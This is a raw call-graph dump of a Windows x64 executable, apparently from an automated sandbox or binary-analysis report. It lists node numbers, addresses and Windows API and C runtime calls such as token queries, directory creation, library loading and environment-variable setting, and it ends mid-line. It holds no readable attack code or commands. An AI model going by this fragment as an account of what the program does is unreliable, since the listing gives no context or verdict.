16714->16716 16718 7ff72b06cd34 16715->16718 16716->16715 16722 7ff72b072614 16716->16722 16719 7ff72b06cd4d 16718->16719 16720 7ff72b063b2f 16718->16720 16719->16720 16757 7ff72b071960 16719->16757 16720->16452 16734 7ff72b06a460 GetLastError 16722->16734 16725 7ff72b07266e 16725->16715 16735 7ff72b06a484 FlsGetValue 16734->16735 16736 7ff72b06a4a1 FlsSetValue 16734->16736 16737 7ff72b06a49b 16735->16737 16753 7ff72b06a491 16735->16753 16738 7ff72b06a4b3 16736->16738 16736->16753 16737->16736 16740 7ff72b06dea8 _get_daylight 11 API calls 16738->16740 16739 7ff72b06a50d SetLastError 16741 7ff72b06a52d 16739->16741 16742 7ff72b06a51a 16739->16742 16743 7ff72b06a4c2 16740->16743 16746 7ff72b069814 __GetCurrentState 38 API calls 16741->16746 16742->16725 16756 7ff72b06f5e8 EnterCriticalSection 16742->16756 16744 7ff72b06a4e0 FlsSetValue 16743->16744 16745 7ff72b06a4d0 FlsSetValue 16743->16745 16748 7ff72b06a4fe 16744->16748 16749 7ff72b06a4ec FlsSetValue 16744->16749 16747 7ff72b06a4d9 16745->16747 16750 7ff72b06a532 16746->16750 16751 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16747->16751 16752 7ff72b06a204 _get_daylight 11 API calls 16748->16752 16749->16747 16751->16753 16754 7ff72b06a506 16752->16754 16753->16739 16755 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16754->16755 16755->16739 16758 7ff72b06a460 __GetCurrentState 45 API calls 16757->16758 16759 7ff72b071969 16758->16759 16766 7ff72b076098 16760->16766 16765 7ff72b06ebb9 MultiByteToWideChar 16763->16765 16769 7ff72b0760fc 16766->16769 16767 7ff72b05b870 _log10_special 8 API calls 16768 7ff72b06f3cd 16767->16768 16768->16554 16769->16767 16771 7ff72b06031d 16770->16771 16772 7ff72b06032f 16770->16772 16773 7ff72b0643f4 _get_daylight 11 API calls 16771->16773 16775 7ff72b06033d 16772->16775 16779 7ff72b060379 16772->16779 16774 7ff72b060322 16773->16774 16776 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 16774->16776 16777 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16775->16777 16784 7ff72b06032d 16776->16784 16777->16784 16778 7ff72b0606f5 16780 7ff72b0643f4 _get_daylight 11 API calls 16778->16780 16778->16784 16779->16778 16781 7ff72b0643f4 _get_daylight 11 API calls 16779->16781 16782 7ff72b060989 16780->16782 16783 7ff72b0606ea 16781->16783 16785 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 16782->16785 16786 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 16783->16786 16784->16418 16785->16784 16786->16778 16788 7ff72b05fa24 16787->16788 16817 7ff72b05f784 16788->16817 16790 7ff72b05fa3d 16790->15974 16829 7ff72b05f6dc 16791->16829 16795 7ff72b05277c 16794->16795 16796 7ff72b0643f4 _get_daylight 11 API calls 16795->16796 16797 7ff72b052799 16796->16797 16843 7ff72b063ca4 16797->16843 16802 7ff72b051bf0 49 API calls 16803 7ff72b052807 16802->16803 16804 7ff72b0586b0 2 API calls 16803->16804 16805 7ff72b05281f 16804->16805 16806 7ff72b05282c MessageBoxW 16805->16806 16807 7ff72b052843 MessageBoxA 16805->16807 16808 7ff72b052855 16806->16808 16807->16808 16809 7ff72b05b870 _log10_special 8 API calls 16808->16809 16810 7ff72b052865 16809->16810 16810->16003 16812 7ff72b05f439 16811->16812 16816 7ff72b051b06 16811->16816 16813 7ff72b0643f4 _get_daylight 11 API calls 16812->16813 16814 7ff72b05f43e 16813->16814 16815 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 16814->16815 16815->16816 16816->16002 16816->16003 16818 7ff72b05f7ee 16817->16818 16819 7ff72b05f7ae 16817->16819 16818->16819 16820 7ff72b05f7fa 16818->16820 16821 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16819->16821 16828 7ff72b06477c EnterCriticalSection 16820->16828 16827 7ff72b05f7d5 16821->16827 16827->16790 16830 7ff72b05f706 16829->16830 16831 7ff72b0519b9 16829->16831 16830->16831 16832 7ff72b05f715 __scrt_get_show_window_mode 16830->16832 16833 7ff72b05f752 16830->16833 16831->15980 16831->15981 16836 7ff72b0643f4 _get_daylight 11 API calls 16832->16836 16842 7ff72b06477c EnterCriticalSection 16833->16842 16838 7ff72b05f72a 16836->16838 16840 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 16838->16840 16840->16831 16845 7ff72b063cfe 16843->16845 16844 7ff72b063d23 16846 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16844->16846 16845->16844 16847 7ff72b063d5f 16845->16847 16849 7ff72b063d4d 16846->16849 16873 7ff72b061f30 16847->16873 16851 7ff72b05b870 _log10_special 8 API calls 16849->16851 16850 7ff72b063e3c 16852 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16850->16852 16853 7ff72b0527d8 16851->16853 16852->16849 16861 7ff72b064480 16853->16861 16855 7ff72b063e60 16855->16850 16857 7ff72b063e6a 16855->16857 16856 7ff72b063e11 16858 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16856->16858 16860 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16857->16860 16858->16849 16859 7ff72b063e08 16859->16850 16859->16856 16860->16849 16862 7ff72b06a5d8 _get_daylight 11 API calls 16861->16862 16863 7ff72b064497 16862->16863 16864 7ff72b06dea8 _get_daylight 11 API calls 16863->16864 16867 7ff72b0644d7 16863->16867 16870 7ff72b0527df 16863->16870 16865 7ff72b0644cc 16864->16865 16866 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16865->16866 16866->16867 16867->16870 17011 7ff72b06df30 16867->17011 16870->16802 16871 7ff72b069c10 _isindst 17 API calls 16872 7ff72b06451c 16871->16872 16874 7ff72b061f6e 16873->16874 16875 7ff72b061f5e 16873->16875 16876 7ff72b061f77 16874->16876 16885 7ff72b061fa5 16874->16885 16878 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16875->16878 16879 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16876->16879 16877 7ff72b061f9d 16877->16850 16877->16855 16877->16856 16877->16859 16878->16877 16879->16877 16880 7ff72b063ae0 45 API calls 16880->16885 16882 7ff72b062254 16884 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16882->16884 16884->16875 16885->16875 16885->16877 16885->16880 16885->16882 16887 7ff72b0628c0 16885->16887 16913 7ff72b062588 16885->16913 16943 7ff72b061e10 16885->16943 16888 7ff72b062975 16887->16888 16889 7ff72b062902 16887->16889 16890 7ff72b06297a 16888->16890 16891 7ff72b0629cf 16888->16891 16892 7ff72b062908 16889->16892 16893 7ff72b06299f 16889->16893 16894 7ff72b06297c 16890->16894 16895 7ff72b0629af 16890->16895 16891->16893 16904 7ff72b0629de 16891->16904 16910 7ff72b062938 16891->16910 16900 7ff72b06290d 16892->16900 16892->16904 16960 7ff72b060e70 16893->16960 16896 7ff72b06291d 16894->16896 16903 7ff72b06298b 16894->16903 16967 7ff72b060a60 16895->16967 16912 7ff72b062a0d 16896->16912 16946 7ff72b063224 16896->16946 16900->16896 16902 7ff72b062950 16900->16902 16900->16910 16902->16912 16956 7ff72b0636e0 16902->16956 16903->16893 16905 7ff72b062990 16903->16905 16904->16912 16974 7ff72b061280 16904->16974 16908 7ff72b063878 37 API calls 16905->16908 16905->16912 16907 7ff72b05b870 _log10_special 8 API calls 16909 7ff72b062ca3 16907->16909 16908->16910 16909->16885 16910->16912 16981 7ff72b06db68 16910->16981 16912->16907 16914 7ff72b0625a9 16913->16914 16915 7ff72b062593 16913->16915 16916 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16914->16916 16919 7ff72b0625e7 16914->16919 16917 7ff72b062975 16915->16917 16918 7ff72b062902 16915->16918 16915->16919 16916->16919 16920 7ff72b06297a 16917->16920 16921 7ff72b0629cf 16917->16921 16922 7ff72b062908 16918->16922 16923 7ff72b06299f 16918->16923 16919->16885 16924 7ff72b06297c 16920->16924 16925 7ff72b0629af 16920->16925 16921->16923 16934 7ff72b0629de 16921->16934 16940 7ff72b062938 16921->16940 16930 7ff72b06290d 16922->16930 16922->16934 16927 7ff72b060e70 38 API calls 16923->16927 16926 7ff72b06291d 16924->16926 16932 7ff72b06298b 16924->16932 16928 7ff72b060a60 38 API calls 16925->16928 16929 7ff72b063224 47 API calls 16926->16929 16942 7ff72b062a0d 16926->16942 16927->16940 16928->16940 16929->16940 16930->16926 16933 7ff72b062950 16930->16933 16930->16940 16931 7ff72b061280 38 API calls 16931->16940 16932->16923 16935 7ff72b062990 16932->16935 16936 7ff72b0636e0 47 API calls 16933->16936 16933->16942 16934->16931 16934->16942 16938 7ff72b063878 37 API calls 16935->16938 16935->16942 16936->16940 16937 7ff72b05b870 _log10_special 8 API calls 16939 7ff72b062ca3 16937->16939 16938->16940 16939->16885 16941 7ff72b06db68 47 API calls 16940->16941 16940->16942 16941->16940 16942->16937 16994 7ff72b060034 16943->16994 16947 7ff72b063246 16946->16947 16948 7ff72b05fea0 12 API calls 16947->16948 16949 7ff72b06328e 16948->16949 16950 7ff72b06d880 46 API calls 16949->16950 16951 7ff72b063361 16950->16951 16952 7ff72b063ae0 45 API calls 16951->16952 16953 7ff72b063383 16951->16953 16952->16953 16954 7ff72b063ae0 45 API calls 16953->16954 16955 7ff72b06340c 16953->16955 16954->16955 16955->16910 16957 7ff72b0636f8 16956->16957 16959 7ff72b063760 16956->16959 16958 7ff72b06db68 47 API calls 16957->16958 16957->16959 16958->16959 16959->16910 16961 7ff72b060ea3 16960->16961 16962 7ff72b060ed2 16961->16962 16964 7ff72b060f8f 16961->16964 16963 7ff72b05fea0 12 API calls 16962->16963 16966 7ff72b060f0f 16962->16966 16963->16966 16965 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16964->16965 16965->16966 16966->16910 16968 7ff72b060a93 16967->16968 16969 7ff72b060ac2 16968->16969 16971 7ff72b060b7f 16968->16971 16970 7ff72b05fea0 12 API calls 16969->16970 16973 7ff72b060aff 16969->16973 16970->16973 16972 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16971->16972 16972->16973 16973->16910 16975 7ff72b0612b3 16974->16975 16976 7ff72b0612e2 16975->16976 16978 7ff72b06139f 16975->16978 16977 7ff72b05fea0 12 API calls 16976->16977 16980 7ff72b06131f 16976->16980 16977->16980 16979 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16978->16979 16979->16980 16980->16910 16982 7ff72b06db90 16981->16982 16983 7ff72b06dbd5 16982->16983 16984 7ff72b063ae0 45 API calls 16982->16984 16987 7ff72b06db95 __scrt_get_show_window_mode 16982->16987 16990 7ff72b06dbbe __scrt_get_show_window_mode 16982->16990 16983->16987 16983->16990 16991 7ff72b06faf8 16983->16991 16984->16983 16985 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16985->16987 16987->16910 16990->16985 16990->16987 16993 7ff72b06fb1c WideCharToMultiByte 16991->16993 16995 7ff72b060073 16994->16995 16996 7ff72b060061 16994->16996 16997 7ff72b0600bd 16995->16997 16999 7ff72b060080 16995->16999 16998 7ff72b0643f4 _get_daylight 11 API calls 16996->16998 17003 7ff72b060166 16997->17003 17004 7ff72b0643f4 _get_daylight 11 API calls 16997->17004 17000 7ff72b060066 16998->17000 17001 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16999->17001 17002 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17000->17002 17008 7ff72b060071 17001->17008 17002->17008 17005 7ff72b0643f4 _get_daylight 11 API calls 17003->17005 17003->17008 17006 7ff72b06015b 17004->17006 17007 7ff72b060210 17005->17007 17009 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17006->17009 17010 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17007->17010 17008->16885 17009->17003 17010->17008 17016 7ff72b06df4d 17011->17016 17012 7ff72b06df52 17013 7ff72b0643f4 _get_daylight 11 API calls 17012->17013 17014 7ff72b0644fd 17012->17014 17015 7ff72b06df5c 17013->17015 17014->16870 17014->16871 17017 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17015->17017 17016->17012 17016->17014 17018 7ff72b06df9c 17016->17018 17017->17014 17018->17014 17019 7ff72b0643f4 _get_daylight 11 API calls 17018->17019 17019->17015 17021 7ff72b067568 17020->17021 17022 7ff72b067555 17020->17022 17030 7ff72b0671cc 17021->17030 17023 7ff72b0643f4 _get_daylight 11 API calls 17022->17023 17025 7ff72b06755a 17023->17025 17026 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17025->17026 17027 7ff72b067566 17026->17027 17027->16021 17037 7ff72b06f5e8 EnterCriticalSection 17030->17037 17039 7ff72b057c13 __vcrt_freefls 17038->17039 17040 7ff72b057b91 GetTokenInformation 17038->17040 17043 7ff72b057c2c 17039->17043 17044 7ff72b057c26 CloseHandle 17039->17044 17041 7ff72b057bb2 GetLastError 17040->17041 17042 7ff72b057bbd 17040->17042 17041->17039 17041->17042 17042->17039 17045 7ff72b057bd9 GetTokenInformation 17042->17045 17043->16030 17044->17043 17045->17039 17046 7ff72b057bfc 17045->17046 17046->17039 17047 7ff72b057c06 ConvertSidToStringSidW 17046->17047 17047->17039 17049 7ff72b05297a 17048->17049 17333 7ff72b053f70 108 API calls 17332->17333 17334 7ff72b051463 17333->17334 17335 7ff72b05146b 17334->17335 17336 7ff72b05148c 17334->17336 17337 7ff72b0525f0 53 API calls 17335->17337 17338 7ff72b05f9f4 73 API calls 17336->17338 17339 7ff72b05147b 17337->17339 17340 7ff72b0514a1 17338->17340 17339->16089 17341 7ff72b0514a5 17340->17341 17342 7ff72b0514c1 17340->17342 17343 7ff72b052760 53 API calls 17341->17343 17344 7ff72b0514f1 17342->17344 17345 7ff72b0514d1 17342->17345 17353 7ff72b0514bc __vcrt_freefls 17343->17353 17348 7ff72b0514f7 17344->17348 17349 7ff72b05150a 17344->17349 17346 7ff72b052760 53 API calls 17345->17346 17346->17353 17347 7ff72b05f36c 74 API calls 17350 7ff72b051584 17347->17350 17356 7ff72b0511f0 17348->17356 17352 7ff72b05f6bc _fread_nolock 53 API calls 17349->17352 17349->17353 17354 7ff72b051596 17349->17354 17350->16089 17352->17349 17353->17347 17355 7ff72b052760 53 API calls 17354->17355 17355->17353 17357 7ff72b051248 17356->17357 17358 7ff72b051277 17357->17358 17359 7ff72b05124f 17357->17359 17362 7ff72b0512ad 17358->17362 17363 7ff72b051291 17358->17363 17360 7ff72b0525f0 53 API calls 17359->17360 17361 7ff72b051262 17360->17361 17361->17353 17366 7ff72b0512bf 17362->17366 17371 7ff72b0512db memcpy_s 17362->17371 17364 7ff72b052760 53 API calls 17363->17364 17365 7ff72b0512a8 17364->17365 17367 7ff72b052760 53 API calls 17366->17367 17367->17365 17369 7ff72b05f6bc _fread_nolock 53 API calls 17369->17371 17371->17365 17371->17369 17374 7ff72b05139f 17371->17374 17375 7ff72b05f430 37 API calls 17371->17375 17376 7ff72b05fdfc 17371->17376 17375->17371 17400 7ff72b053f1a 17399->17400 17401 7ff72b0586b0 2 API calls 17400->17401 17402 7ff72b053f3f 17401->17402 17403 7ff72b05b870 _log10_special 8 API calls 17402->17403 17404 7ff72b053f67 17403->17404 17404->16114 17406 7ff72b05753e 17405->17406 17407 7ff72b057662 17406->17407 17408 7ff72b051bf0 49 API calls 17406->17408 17409 7ff72b05b870 _log10_special 8 API calls 17407->17409 17412 7ff72b0575c5 17408->17412 17410 7ff72b057693 17409->17410 17410->16114 17411 7ff72b051bf0 49 API calls 17411->17412 17412->17407 17412->17411 17413 7ff72b053f10 10 API calls 17412->17413 17414 7ff72b05761b 17412->17414 17413->17412 17415 7ff72b0586b0 2 API calls 17414->17415 17416 7ff72b057633 CreateDirectoryW 17415->17416 17416->17407 17416->17412 17418 7ff72b0515f7 17417->17418 17419 7ff72b0515d3 17417->17419 17421 7ff72b053f70 108 API calls 17418->17421 17506 7ff72b051050 17419->17506 17423 7ff72b05160b 17421->17423 17422 7ff72b0515d8 17426 7ff72b0515ee 17422->17426 17429 7ff72b0525f0 53 API calls 17422->17429 17424 7ff72b05163b 17423->17424 17425 7ff72b051613 17423->17425 17428 7ff72b053f70 108 API calls 17424->17428 17427 7ff72b052760 53 API calls 17425->17427 17426->16114 17430 7ff72b05162a 17427->17430 17431 7ff72b05164f 17428->17431 17429->17426 17430->16114 17432 7ff72b051657 17431->17432 17433 7ff72b051671 17431->17433 17434 7ff72b0525f0 53 API calls 17432->17434 17435 7ff72b05f9f4 73 API calls 17433->17435 17436 7ff72b051667 17434->17436 17437 7ff72b051686 17435->17437 17456 7ff72b05694b 17455->17456 17458 7ff72b056904 17455->17458 17456->16114 17458->17456 17545 7ff72b064250 17458->17545 17460 7ff72b053b51 17459->17460 17461 7ff72b053e90 49 API calls 17460->17461 17462 7ff72b053b8b 17461->17462 17463 7ff72b053e90 49 API calls 17462->17463 17464 7ff72b053b9b 17463->17464 17465 7ff72b053bec 17464->17465 17466 7ff72b053bbd 17464->17466 17468 7ff72b053ac0 51 API calls 17465->17468 17576 7ff72b053ac0 17466->17576 17469 7ff72b053bea 17468->17469 17504 7ff72b051bf0 49 API calls 17503->17504 17505 7ff72b053e24 17504->17505 17505->16114 17507 7ff72b053f70 108 API calls 17506->17507 17508 7ff72b05108b 17507->17508 17509 7ff72b0510a8 17508->17509 17510 7ff72b051093 17508->17510 17512 7ff72b05f9f4 73 API calls 17509->17512 17511 7ff72b0525f0 53 API calls 17510->17511 17517 7ff72b0510a3 __vcrt_freefls 17511->17517 17513 7ff72b0510bd 17512->17513 17514 7ff72b0510dd 17513->17514 17515 7ff72b0510c1 17513->17515 17517->17422 17546 7ff72b06425d 17545->17546 17548 7ff72b06428a 17545->17548 17549 7ff72b0643f4 _get_daylight 11 API calls 17546->17549 17557 7ff72b064214 17546->17557 17547 7ff72b0642ad 17551 7ff72b0643f4 _get_daylight 11 API calls 17547->17551 17548->17547 17552 7ff72b0642c9 17548->17552 17550 7ff72b064267 17549->17550 17553 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17550->17553 17554 7ff72b0642b2 17551->17554 17560 7ff72b064178 17552->17560 17556 7ff72b064272 17553->17556 17558 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17554->17558 17556->17458 17557->17458 17559 7ff72b0642bd 17558->17559 17559->17458 17561 7ff72b06419c 17560->17561 17567 7ff72b064197 17560->17567 17562 7ff72b06a460 __GetCurrentState 45 API calls 17561->17562 17561->17567 17563 7ff72b0641b7 17562->17563 17568 7ff72b06cc94 17563->17568 17567->17559 17577 7ff72b053ae6 17576->17577 17640 7ff72b05be12 RtlLookupFunctionEntry 17639->17640 17641 7ff72b05be28 RtlVirtualUnwind 17640->17641 17642 7ff72b05bc2b 17640->17642 17641->17640 17641->17642 17643 7ff72b05bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17642->17643 17647 7ff72b0651d8 17644->17647 17645 7ff72b0651fe 17646 7ff72b0643f4 _get_daylight 11 API calls 17645->17646 17648 7ff72b065203 17646->17648 17647->17645 17649 7ff72b065231 17647->17649 17650 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 17648->17650 17651 7ff72b065237 17649->17651 17652 7ff72b065244 17649->17652 17654 7ff72b053fc6 17650->17654 17655 7ff72b0643f4 _get_daylight 11 API calls 17651->17655 17663 7ff72b069f38 17652->17663 17654->16150 17655->17654 17676 7ff72b06f5e8 EnterCriticalSection 17663->17676 18036 7ff72b066c08 18035->18036 18039 7ff72b0666e4 18036->18039 18038 7ff72b066c21 18038->16160 18040 7ff72b06672e 18039->18040 18041 7ff72b0666ff 18039->18041 18049 7ff72b06477c EnterCriticalSection 18040->18049 18042 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 18041->18042 18044 7ff72b06671f 18042->18044 18044->18038 18051 7ff72b05f163 18050->18051 18052 7ff72b05f191 18050->18052 18053 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 18051->18053 18054 7ff72b05f183 18052->18054 18060 7ff72b06477c EnterCriticalSection 18052->18060 18053->18054 18054->16164 18062 7ff72b0586b0 2 API calls 18061->18062 18063 7ff72b0581b4 LoadLibraryExW 18062->18063 18064 7ff72b0581d3 __vcrt_freefls 18063->18064 18064->16194 18066 7ff72b056ec9 18065->18066 18067 7ff72b056ef3 GetProcAddress 18065->18067 18069 7ff72b0529e0 51 API calls 18066->18069 18067->18066 18068 7ff72b056f18 GetProcAddress 18067->18068 18068->18066 18070 7ff72b056f3d GetProcAddress 18068->18070 18071 7ff72b056ee3 18069->18071 18070->18066 18071->16200 18131 7ff72b055b05 18130->18131 18132 7ff72b051bf0 49 API calls 18131->18132 18133 7ff72b055b41 18132->18133 18134 7ff72b055b6d 18133->18134 18135 7ff72b055b4a 18133->18135 18137 7ff72b053fe0 49 API calls 18134->18137 18136 7ff72b0525f0 53 API calls 18135->18136 18153 7ff72b055b63 18136->18153 18138 7ff72b055b85 18137->18138 18139 7ff72b055ba3 18138->18139 18142 7ff72b0525f0 53 API calls 18138->18142 18140 7ff72b053f10 10 API calls 18139->18140 18143 7ff72b055bad 18140->18143 18141 7ff72b05b870 _log10_special 8 API calls 18144 7ff72b05308e 18141->18144 18142->18139 18145 7ff72b055bbb 18143->18145 18146 7ff72b0581a0 3 API calls 18143->18146 18144->16234 18161 7ff72b055c80 18144->18161 18147 7ff72b053fe0 49 API calls 18145->18147 18146->18145 18148 7ff72b055bd4 18147->18148 18149 7ff72b055bf9 18148->18149 18150 7ff72b055bd9 18148->18150 18152 7ff72b0581a0 3 API calls 18149->18152 18151 7ff72b0525f0 53 API calls 18150->18151 18151->18153 18154 7ff72b055c06 18152->18154 18153->18141 18300 7ff72b054c80 18161->18300 18163 7ff72b055cba 18164 7ff72b055cd3 18163->18164 18165 7ff72b055cc2 18163->18165 18307 7ff72b054450 18164->18307 18166 7ff72b0525f0 53 API calls 18165->18166 18301 7ff72b054cac 18300->18301 18302 7ff72b054cb4 18301->18302 18305 7ff72b054e54 18301->18305 18338 7ff72b065db4 18301->18338 18302->18163 18303 7ff72b055017 __vcrt_freefls 18303->18163 18304 7ff72b054180 47 API calls 18304->18305 18305->18303 18305->18304 18308 7ff72b054480 18307->18308 18339 7ff72b065de4 18338->18339 18342 7ff72b0652b0 18339->18342 18343 7ff72b0652f3 18342->18343 18344 7ff72b0652e1 18342->18344 18418->16238 18420 7ff72b06a460 __GetCurrentState 45 API calls 18419->18420 18422 7ff72b0696f1 18420->18422 18424 7ff72b069814 18422->18424 18433 7ff72b072960 18424->18433 18459 7ff72b072918 18433->18459 18464 7ff72b06f5e8 EnterCriticalSection 18459->18464 18633 7ff72b06fbd8 18634 7ff72b06fbfc 18633->18634 18638 7ff72b06fc0c 18633->18638 18635 7ff72b0643f4 _get_daylight 11 API calls 18634->18635 18636 7ff72b06fc01 18635->18636 18637 7ff72b06feec 18640 7ff72b0643f4 _get_daylight 11 API calls 18637->18640 18638->18637 18639 7ff72b06fc2e 18638->18639 18641 7ff72b06fc4f 18639->18641 18764 7ff72b070294 18639->18764 18642 7ff72b06fef1 18640->18642 18645 7ff72b06fcc1 18641->18645 18646 7ff72b06fc75 18641->18646 18660 7ff72b06fcb5 18641->18660 18644 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18642->18644 18644->18636 18648 7ff72b06dea8 _get_daylight 11 API calls 18645->18648 18663 7ff72b06fc84 18645->18663 18779 7ff72b0689d8 18646->18779 18650 7ff72b06fcd7 18648->18650 18654 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18650->18654 18652 7ff72b06fd6e 18657 7ff72b06fddd 18652->18657 18658 7ff72b06fd8b 18652->18658 18653 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18653->18636 18661 7ff72b06fce5 18654->18661 18655 7ff72b06fc9d 18655->18660 18665 7ff72b070294 45 API calls 18655->18665 18656 7ff72b06fc7f 18662 7ff72b0643f4 _get_daylight 11 API calls 18656->18662 18657->18663 18666 7ff72b0726ec 40 API calls 18657->18666 18659 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18658->18659 18664 7ff72b06fd94 18659->18664 18660->18652 18660->18663 18785 7ff72b07643c 18660->18785 18661->18660 18661->18663 18668 7ff72b06dea8 _get_daylight 11 API calls 18661->18668 18662->18663 18663->18653 18673 7ff72b06fd99 18664->18673 18821 7ff72b0726ec 18664->18821 18665->18660 18667 7ff72b06fe1a 18666->18667 18669 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18667->18669 18671 7ff72b06fd07 18668->18671 18672 7ff72b06fe24 18669->18672 18676 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18671->18676 18672->18663 18672->18673 18674 7ff72b06fee0 18673->18674 18679 7ff72b06dea8 _get_daylight 11 API calls 18673->18679 18677 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18674->18677 18675 7ff72b06fdc5 18678 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18675->18678 18676->18660 18677->18636 18678->18673 18680 7ff72b06fe68 18679->18680 18681 7ff72b06fe79 18680->18681 18682 7ff72b06fe70 18680->18682 18683 7ff72b0697b4 __std_exception_copy 37 API calls 18681->18683 18684 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18682->18684 18685 7ff72b06fe88 18683->18685 18686 7ff72b06fe77 18684->18686 18687 7ff72b06ff1b 18685->18687 18688 7ff72b06fe90 18685->18688 18691 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18686->18691 18690 7ff72b069c10 _isindst 17 API calls 18687->18690 18830 7ff72b076554 18688->18830 18693 7ff72b06ff2f 18690->18693 18691->18636 18696 7ff72b06ff58 18693->18696 18702 7ff72b06ff68 18693->18702 18694 7ff72b06feb7 18697 7ff72b0643f4 _get_daylight 11 API calls 18694->18697 18695 7ff72b06fed8 18699 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18695->18699 18698 7ff72b0643f4 _get_daylight 11 API calls 18696->18698 18700 7ff72b06febc 18697->18700 18723 7ff72b06ff5d 18698->18723 18699->18674 18703 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18700->18703 18701 7ff72b07024b 18705 7ff72b0643f4 _get_daylight 11 API calls 18701->18705 18702->18701 18704 7ff72b06ff8a 18702->18704 18703->18686 18706 7ff72b06ffa7 18704->18706 18849 7ff72b07037c 18704->18849 18707 7ff72b070250 18705->18707 18710 7ff72b07001b 18706->18710 18712 7ff72b06ffcf 18706->18712 18718 7ff72b07000f 18706->18718 18709 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18707->18709 18709->18723 18714 7ff72b070043 18710->18714 18719 7ff72b06dea8 _get_daylight 11 API calls 18710->18719 18734 7ff72b06ffde 18710->18734 18711 7ff72b0700ce 18722 7ff72b0700eb 18711->18722 18731 7ff72b07013e 18711->18731 18864 7ff72b068a14 18712->18864 18716 7ff72b06dea8 _get_daylight 11 API calls 18714->18716 18714->18718 18714->18734 18721 7ff72b070065 18716->18721 18717 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18717->18723 18718->18711 18718->18734 18870 7ff72b0762fc 18718->18870 18724 7ff72b070035 18719->18724 18727 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18721->18727 18728 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18722->18728 18729 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18724->18729 18725 7ff72b06ffd9 18730 7ff72b0643f4 _get_daylight 11 API calls 18725->18730 18726 7ff72b06fff7 18726->18718 18733 7ff72b07037c 45 API calls 18726->18733 18727->18718 18732 7ff72b0700f4 18728->18732 18729->18714 18730->18734 18731->18734 18735 7ff72b0726ec 40 API calls 18731->18735 18738 7ff72b0726ec 40 API calls 18732->18738 18740 7ff72b0700fa 18732->18740 18733->18718 18734->18717 18736 7ff72b07017c 18735->18736 18737 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18736->18737 18739 7ff72b070186 18737->18739 18742 7ff72b070126 18738->18742 18739->18734 18739->18740 18741 7ff72b07023f 18740->18741 18745 7ff72b06dea8 _get_daylight 11 API calls 18740->18745 18743 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18741->18743 18744 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18742->18744 18743->18723 18744->18740 18746 7ff72b0701cb 18745->18746 18747 7ff72b0701dc 18746->18747 18748 7ff72b0701d3 18746->18748 18749 7ff72b06f784 37 API calls 18747->18749 18750 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18748->18750 18752 7ff72b0701ea 18749->18752 18751 7ff72b0701da 18750->18751 18758 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18751->18758 18753 7ff72b0701f2 SetEnvironmentVariableW 18752->18753 18754 7ff72b07027f 18752->18754 18755 7ff72b070237 18753->18755 18756 7ff72b070216 18753->18756 18757 7ff72b069c10 _isindst 17 API calls 18754->18757 18761 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18755->18761 18759 7ff72b0643f4 _get_daylight 11 API calls 18756->18759 18760 7ff72b070293 18757->18760 18758->18723 18762 7ff72b07021b 18759->18762 18761->18741 18763 